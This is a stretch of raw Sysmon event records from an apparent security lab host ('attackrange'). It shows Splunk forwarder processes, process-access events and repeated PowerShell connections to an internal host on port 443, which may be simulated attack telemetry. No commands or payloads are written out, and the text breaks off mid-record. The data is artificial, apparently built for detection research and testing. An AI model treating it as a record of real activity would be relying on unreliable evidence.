354300x800000000000000035343823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:15.128{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52601-false10.0.1.12-8000- 354300x800000000000000035343822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:14.476{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52600-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:51.664{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FA806962FE137A39B9BC18A386AAB53,SHA256=F3C97E672BD5EA5BF9208DBFCEC94B2C57FE6ED5C8368331701C94E50CE8C991,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:52.681{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=176B8AE9A041BC1B87362BFA4F9B7AFC,SHA256=13722E6135568032982F6FCDBE59079A8CA2D89D9A4DE85F6653E30B7FDF32A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:52.583{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8A21684633ACDCA5654A035E1A09D99F,SHA256=85B750514018978D4A4AD98034F428E66EC9064978AA5B3F7F6F1C732120E401,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:53.715{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53D16C7E7EB1493478C736B698BAA715,SHA256=9F7883FDD053854A1F88E03A76E16D42F2FE6132B5CF669F67BA6FB18AACF5BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:54.747{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A9A241D46A5820AAB02686CFE73E336,SHA256=2EDABE7D64516229DD233CE541431E395F5A43B6B1453B5A9D6DFB56202965A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.487{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52602-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:55.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0C1272E73FB76BDFF21C11946B7C7BA,SHA256=37BB60388E1BBBC9F194DA013D56B64C6FE4093CA9AAF470B1F01A4529651EED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:20.168{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52603-false10.0.1.12-8000- 23542300x800000000000000035343834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:56.782{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F23956CCF2CDB4143A538E3316540CE4,SHA256=EDE9E6DB2BD829727B0BC6A0D92D8DA823A0A59C3C8B463F2054C2F3B20F5FCA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:56.546{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5740A2860D590C3766083810A5A0349D,SHA256=392542737C4A029317CDEE20BB4F85D47FD7DD4F303EEEC83B4682BFA1E37500,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:57.817{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB31A942E834CCA24F67F47F6FCC6391,SHA256=0BE1EF1718D4D5B1AF6D02B9DDFD2F8D643BC6FAA8F3AB1CEDF92F213A436E04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:22.507{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52604-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:58.847{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AB23DB3395C24057DFBE27499ADCE8C,SHA256=B5CF19D493F158D2BC6C64C3D540BEBAD0EFAAAE4C8AD28C6CC1FE322DE72324,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:59.881{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB5F6F4507DEF405BD98AAEF4EFECA4B,SHA256=19C4689380B801243B663745652585493E2BE927E243F00FBE1E38F15A450675,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:00.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E64D9279928BD9C5D2BA9EAD4599F3C,SHA256=96A2BC474237C8045F3D8D2EB8EFB440A0788F98F86BEE0BC2AC32ABF3A97EBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:25.186{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52605-false10.0.1.12-8000- 23542300x800000000000000035343842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:01.905{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37E9E871BB9A487C6DE67ADFB283F048,SHA256=0922DD06ED95F854401B23128D2EA741130BFCCE1364F21D3244D7D601BAB669,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:01.618{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=27C4A68888534CBA2131542BC11E9635,SHA256=E832C171B62BD80FB6475527455A1D12692B6112EE0A840F7787A157F44C30C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:02.950{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6179E2F260C06F43142271E7E5F9FB82,SHA256=4EE0C3787560BB35BAF35313A61B5CEC711B6085EC74F9BDA2BABF70A323C7CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:27.510{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52606-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:03.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C263F2315105C61E8BC66AFD2F1982B,SHA256=1C0847750FA8CE3121F39C151972CD49539F9DB9B7371139AB3435D3368BEBA6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.781{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7498-613B-6CB4-03000000C801}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.765{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.765{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.765{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7498-613B-6CB4-03000000C801}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.765{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.765{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.765{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7498-613B-6CB4-03000000C801}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.750{B81B27B7-7498-613B-6CB4-03000000C801}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035343854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.234{B81B27B7-7498-613B-6BB4-03000000C801}9525072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.066{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7498-613B-6BB4-03000000C801}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.066{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.066{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.066{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.066{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.066{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-7498-613B-6BB4-03000000C801}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.066{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7498-613B-6BB4-03000000C801}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.051{B81B27B7-7498-613B-6BB4-03000000C801}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 